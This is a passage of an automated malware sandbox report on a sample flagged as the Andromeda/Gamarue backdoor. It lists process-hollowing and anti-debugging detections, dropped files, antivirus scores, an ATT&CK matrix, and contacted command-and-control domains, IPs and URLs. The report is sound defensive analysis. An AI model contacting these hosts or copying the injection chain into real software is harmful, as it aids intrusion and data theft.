    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E1700 GetDriveTypeW,wsprintfW,wsprintfW,FindFirstFileW,DeleteFileW,wsprintfW,wsprintfW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,lstrcmpiW,lstrcmpiW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,lstrcmpiW,lstrcmpiW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,wsprintfW,SetFileAttributesW,FindNextFileW,FindClose,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E1B70 wsprintfW,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,FindClose,FindClose,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E10D0 RegisterClassW,LdrInitializeThunk,_memset,GetLogicalDriveStringsW,GetDriveTypeW,GetDriveTypeW,SetErrorMode,CreateWindowExW,GetMessageW,GetMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,GetMessageW,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeAPI call chain: ExitProcess graph end node
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeAPI call chain: ExitProcess graph end node
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeAPI call chain: ExitProcess graph end node
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeAPI call chain: ExitProcess graph end node
    Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
    Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
    Source: msiexec.exe, 00000007.00000002.365371579.000000000042D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.365418173.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.365771183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381464840.0000000000080000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: qemut!
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_00401999 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00405D2E GetModuleHandleA,LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00020973 GetProcessHeap,GetVersionExA,NtQueryInformationProcess,NtDelayExecution,VirtualAlloc,GetEnvironmentVariableW,SetEnvironmentVariableW,GetShortPathNameW,wsprintfA,CreateMutexA,GetLastError,SetFileAttributesW,DeleteFileW,VirtualFree,WSAStartup,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateThread,WaitForSingleObject,CloseHandle,NtDelayExecution,SetFileAttributesW,DeleteFileW,VirtualFree,ExitProcess,SetErrorMode,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_00401220 rdtsc
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 8_2_00401284 mov ebx, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 8_2_0040141C mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00081284 mov ebx, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0008141C mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00020550 mov ebx, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00020973 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_000219D1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E10D0 RegisterClassW,LdrInitializeThunk,_memset,GetLogicalDriveStringsW,GetDriveTypeW,GetDriveTypeW,SetErrorMode,CreateWindowExW,GetMessageW,GetMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,GetMessageW,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_00401999 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_00401E7F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E3493 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E2D41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 147.75.61.38 80
    Source: C:\Windows\SysWOW64\svchost.exeDomain query: pe.suckmycocklameavindustry.in
    Source: C:\Windows\SysWOW64\svchost.exeDomain query: xdqzpbcgrvkj.ru
    Source: C:\Windows\SysWOW64\svchost.exeDomain query: anam0rph.su
    Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.29.71.138 80
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeSection unmapped: C:\Users\user\Desktop\Hu25VEa8Dr.exe base address: 400000
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeSection unmapped: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base address: 400000
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeSection unmapped: C:\Users\user\Desktop\Hu25VEa8Dr.exe base address: 400000
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: CD0000
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 400000
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 401000
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 402000
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 403000
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 7EFDE008
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 400000
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 401000
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 402000
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 403000
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 7EFDE008
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory allocated: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 400000 protect: page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory allocated: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 400000 protect: page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 400000 value starts with: 4D5A
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeMemory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 400000 value starts with: 4D5A
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 400000 value starts with: 4D5A
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeMemory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 400000 value starts with: 4D5A
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeCode function: 2_2_10001000 bedevahetay,LoadLibraryA,GetCommandLineA,PathGetArgsA,RtlZeroMemory,LoadLibraryA,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe C:\Users\user\AppData\Local\Temp\Sahofivizu.exe" "C:\Users\user\Desktop\Hu25VEa8Dr.exe
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeProcess created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe "C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe" "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\syswow64\svchost.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_00401000 GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
    Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_0040332F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00405A2E GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
    Source: Hu25VEa8Dr.exeBinary or memory string: avp.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1740, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1740, type: MEMORYSTR
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts3
    Native API
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Obfuscated Files or Information
    OS Credential Dumping1
    System Time Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium13
    Ingress Tool Transfer
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts1
    Shared Modules
    1
    Registry Run Keys / Startup Folder
    711
    Process Injection
    21
    Software Packing
    LSASS Memory1
    Peripheral Device Discovery
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth2
    Encrypted Channel
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    Command and Scripting Interpreter
    Logon Script (Windows)1
    Registry Run Keys / Startup Folder
    1
    DLL Side-Loading
    Security Account Manager1
    System Network Connections Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
    Masquerading
    NTDS3
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer13
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Modify Registry
    LSA Secrets116
    System Information Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common13
    Virtualization/Sandbox Evasion
    Cached Domain Credentials361
    Security Software Discovery
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items711
    Process Injection
    DCSync13
    Virtualization/Sandbox Evasion
    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
    Process Discovery
    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
    Remote System Discovery
    Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1317431 Sample: Hu25VEa8Dr Startdate: 01/10/2023 Architecture: WINDOWS Score: 100 94 Tries to download HTTP data from a sinkholed server 2->94 96 Snort IDS alert for network traffic 2->96 98 Multi AV Scanner detection for domain / URL 2->98 100 7 other signatures 2->100 12 Hu25VEa8Dr.exe 15 2->12         started        process3 file4 48 C:\Users\user\AppData\...\xuxokuxoka.dll, PE32 12->48 dropped 50 C:\Users\user\AppData\...\natigezeholi.dll, PE32 12->50 dropped 52 C:\Users\user\AppData\...\Zojemilocan.dll, PE32 12->52 dropped 54 2 other malicious files 12->54 dropped 112 Detected unpacking (changes PE section rights) 12->112 114 Detected unpacking (overwrites its own PE header) 12->114 16 Sahofivizu.exe 12->16         started        19 svchost.exe 2 16 12->19         started        signatures5 process6 dnsIp7 70 Antivirus detection for dropped file 16->70 72 Multi AV Scanner detection for dropped file 16->72 74 Contains functionality to inject code into remote processes 16->74 84 4 other signatures 16->84 23 Hu25VEa8Dr.exe 18 16->23         started        64 pe.suckmycocklameavindustry.in 19->64 66 xdqzpbcgrvkj.ru 147.75.61.38, 49166, 80 PACKETUS Switzerland 19->66 68 3 other IPs or domains 19->68 42 C:\ProgramData\Local Settings\...\msoiruj.bat, PE32 19->42 dropped 76 System process connects to network (likely due to code injection or exploit) 19->76 78 Creates an undocumented autostart registry key 19->78 80 Contains functionality to check if Internet connection is working 19->80 82 Contain functionality to detect virtual machines 19->82 file8 signatures9 process10 signatures11 106 Injects a PE file into a foreign processes 23->106 26 Hu25VEa8Dr.exe 2 5 23->26         started        process12 file13 44 C:\Users\user\AppData\Local\...\msiexec.exe, PE32 26->44 dropped 46 C:\Users\user\AppData\Local\Temp\0BBFF.tmp, PE32 26->46 dropped 29 msiexec.exe 15 26->29         started        process14 file15 56 C:\Users\user\AppData\...\yiduyevutog.dll, PE32 29->56 dropped 58 C:\Users\user\AppData\...\naseropuxeq.dll, PE32 29->58 dropped 60 C:\Users\user\AppData\...\Lohonibuhod.exe, PE32 29->60 dropped 62 2 other malicious files 29->62 dropped 116 Antivirus detection for dropped file 29->116 118 Multi AV Scanner detection for dropped file 29->118 120 Detected unpacking (changes PE section rights) 29->120 122 4 other signatures 29->122 33 Lohonibuhod.exe 29->33         started        signatures16 process17 signatures18 86 Antivirus detection for dropped file 33->86 88 Multi AV Scanner detection for dropped file 33->88 90 Writes to foreign memory regions 33->90 92 3 other signatures 33->92 36 msiexec.exe 9 33->36         started        process19 signatures20 102 Sample uses process hollowing technique 36->102 104 Injects a PE file into a foreign processes 36->104 39 msiexec.exe 36->39         started        process21 signatures22 108 Maps a DLL or memory area into another process 39->108 110 Sample uses process hollowing technique 39->110

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Hu25VEa8Dr.exe96%ReversingLabsWin32.Backdoor.Andromeda
    Hu25VEa8Dr.exe82%VirustotalBrowse
    Hu25VEa8Dr.exe100%AviraTR/AD.Gamarue.njjtd
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\Gozekeneka.dll100%AviraHEUR/AGEN.1358866
    C:\Users\user\AppData\Local\Temp\0BBFF.tmp100%AviraTR/AD.Gamarue.njjtd
    C:\Users\user\AppData\Local\Temp\xuxokuxoka.dll100%AviraTR/Symmi.17001.30
    C:\Users\user\AppData\Local\Temp\naseropuxeq.dll100%AviraTR/Graftor.75972.7
    C:\Users\user\AppData\Local\Temp\yiduyevutog.dll100%AviraTR/Symmi.17001.22
    C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe100%AviraTR/Agent.hwpf
    C:\Users\user\AppData\Local\Temp\natigezeholi.dll100%AviraHEUR/AGEN.1328724
    C:\ProgramData\Local Settings\Temp\msoiruj.bat100%AviraTR/AD.Gamarue.djauj
    C:\Users\user\AppData\Local\Temp\Sahofivizu.exe100%AviraHEUR/AGEN.1344339
    C:\Users\user\AppData\Local\Temp\Jahulocayedo.dll100%AviraTR/Symmi.17001.23
    C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe100%AviraTR/AD.Gamarue.djauj
    C:\Users\user\AppData\Local\Temp\Zojemilocan.dll100%AviraHEUR/AGEN.1322941
    C:\ProgramData\Local Settings\Temp\msoiruj.bat100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe100%Joe Sandbox ML
    C:\ProgramData\Local Settings\Temp\msoiruj.bat87%ReversingLabsWin32.Backdoor.Andromeda
    C:\ProgramData\Local Settings\Temp\msoiruj.bat85%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\0BBFF.tmp96%ReversingLabsWin32.Backdoor.Andromeda
    C:\Users\user\AppData\Local\Temp\0BBFF.tmp82%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\Firozedikami.dll59%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Temp\Firozedikami.dll59%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\Gozekeneka.dll77%ReversingLabsWin32.Trojan.Tiggre
    C:\Users\user\AppData\Local\Temp\Gozekeneka.dll75%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\Jahulocayedo.dll71%ReversingLabsWin32.Trojan.Ursu
    C:\Users\user\AppData\Local\Temp\Jahulocayedo.dll66%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe76%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe77%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe87%ReversingLabsWin32.Backdoor.Andromeda
    C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe85%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\Sahofivizu.exe57%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Temp\Sahofivizu.exe61%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\Zojemilocan.dll64%ReversingLabsWin32.Backdoor.Andromeda
    C:\Users\user\AppData\Local\Temp\Zojemilocan.dll74%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\naseropuxeq.dll59%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Temp\naseropuxeq.dll71%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\natigezeholi.dll78%ReversingLabsWin32.Trojan.Ursu
    C:\Users\user\AppData\Local\Temp\natigezeholi.dll76%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\xuxokuxoka.dll67%ReversingLabsWin32.Trojan.Symmi
    C:\Users\user\AppData\Local\Temp\xuxokuxoka.dll67%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\yiduyevutog.dll71%ReversingLabsWin32.Trojan.Ursu
    C:\Users\user\AppData\Local\Temp\yiduyevutog.dll73%VirustotalBrowse
    No Antivirus matches
    SourceDetectionScannerLabelLink
    xdqzpbcgrvkj.ru19%VirustotalBrowse
    anam0rph.su11%VirustotalBrowse
    pe.suckmycocklameavindustry.in7%VirustotalBrowse
    SourceDetectionScannerLabelLink
    http://pe.suckmycocklameavindustry.in/0%Avira URL Cloudsafe
    http://orzdwjtvmein.in/in.php100%Avira URL Cloudmalware
    http://bdcrqgonzmwuehky.nl/in.php100%Avira URL Cloudmalware
    http://pe.suckmycocklameavindustry.in/DOS_STUBhttp://sc.suckmycocklameavindustry.in/ImageBasehttp://0%Avira URL Cloudsafe
    http://orzdwjtvmein.in/in.php11%VirustotalBrowse
    http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigffC:0%Avira URL Cloudsafe
    http://pe.suckmycocklameavindustry.in/7%VirustotalBrowse
    http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff6Tl0%Avira URL Cloudsafe
    http://somicrososoft.ru/in.php100%Avira URL Cloudmalware
    http://pe.suckmycocklameavindustry.in/DOS_STUBhttp://sc.suckmycocklameavindustry.in/ImageBasehttp://3%VirustotalBrowse
    http://img.suckmycocklameavindustry.in/0%Avira URL Cloudsafe
    http://xdqzpbcgrvkj.ru/in.php100%Avira URL Cloudmalware
    http://bdcrqgonzmwuehky.nl/in.php11%VirustotalBrowse
    http://somicrososoft.ru/in.php14%VirustotalBrowse
    http://anam0rph.su/in.php100%Avira URL Cloudmalware
    http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqh100%Avira URL Cloudmalware
    http://img.suckmycocklameavindustry.in/4%VirustotalBrowse
    http://sc.suckmycocklameavindustry.in/0%Avira URL Cloudsafe
    http://ygiudewsqhct.in/in.php100%Avira URL Cloudmalware
    http://anam0rph.su/in.php13%VirustotalBrowse
    http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqh14%VirustotalBrowse
    http://ygiudewsqhct.in/in.php13%VirustotalBrowse
    http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff0%Avira URL Cloudsafe
    http://xdqzpbcgrvkj.ru/in.php17%VirustotalBrowse
    http://sc.suckmycocklameavindustry.in/7%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    pe.suckmycocklameavindustry.in
    34.29.71.138
    truetrueunknown
    xdqzpbcgrvkj.ru
    147.75.61.38
    truetrueunknown
    anam0rph.su
    unknown
    unknowntrueunknown
    NameMaliciousAntivirus DetectionReputation
    http://xdqzpbcgrvkj.ru/in.phptrue
    • 17%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigfftrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://pe.suckmycocklameavindustry.in/svchost.exefalse
    • 7%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://orzdwjtvmein.in/in.phpsvchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpfalse
    • 11%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://nsis.sf.net/NSIS_Errormsiexec.exe, msiexec.exe, 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000005.00000000.351213851.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000007.00000000.364458175.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000008.00000000.365114158.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, Hu25VEa8Dr.exe, 0BBFF.tmp.4.dr, msoiruj.bat.9.dr, msiexec.exe.4.drfalse
      high
      http://bdcrqgonzmwuehky.nl/in.phpsvchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpfalse
      • 11%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://pe.suckmycocklameavindustry.in/DOS_STUBhttp://sc.suckmycocklameavindustry.in/ImageBasehttp://svchost.exe, 00000009.00000003.373478974.0000000000130000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmpfalse
      • 3%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigffC:svchost.exe, 00000009.00000002.381503603.00000000004D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381500240.000000000044A000.00000004.00000010.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff6Tlsvchost.exe, 00000009.00000002.381503603.0000000000484000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://somicrososoft.ru/in.phpsvchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpfalse
      • 14%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://img.suckmycocklameavindustry.in/svchost.exefalse
      • 4%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://nsis.sf.net/Hu25VEa8Dr.exe, 00000003.00000002.350134891.0000000002120000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://nsis.sf.net/NSIS_ErrorErrorHu25VEa8Dr.exe, 0BBFF.tmp.4.dr, msoiruj.bat.9.dr, msiexec.exe.4.drfalse
          high
          http://anam0rph.su/in.phpsvchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpfalse
          • 13%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqhsvchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpfalse
          • 14%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://sc.suckmycocklameavindustry.in/svchost.exefalse
          • 7%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://ygiudewsqhct.in/in.phpsvchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpfalse
          • 13%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          34.29.71.138
          pe.suckmycocklameavindustry.inUnited States
          2686ATGS-MMD-ASUStrue
          147.75.61.38
          xdqzpbcgrvkj.ruSwitzerland
          54825PACKETUStrue
          IP
          192.168.2.255
          Joe Sandbox Version:38.0.0 Beryl
          Analysis ID:1317431
          Start date and time:2023-10-01 06:00:34 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 5m 36s
          Hypervisor based Inspection enabled:false
          Report type:light
          Cookbook file name:default.jbs
          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of analysed new started processes analysed:13
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
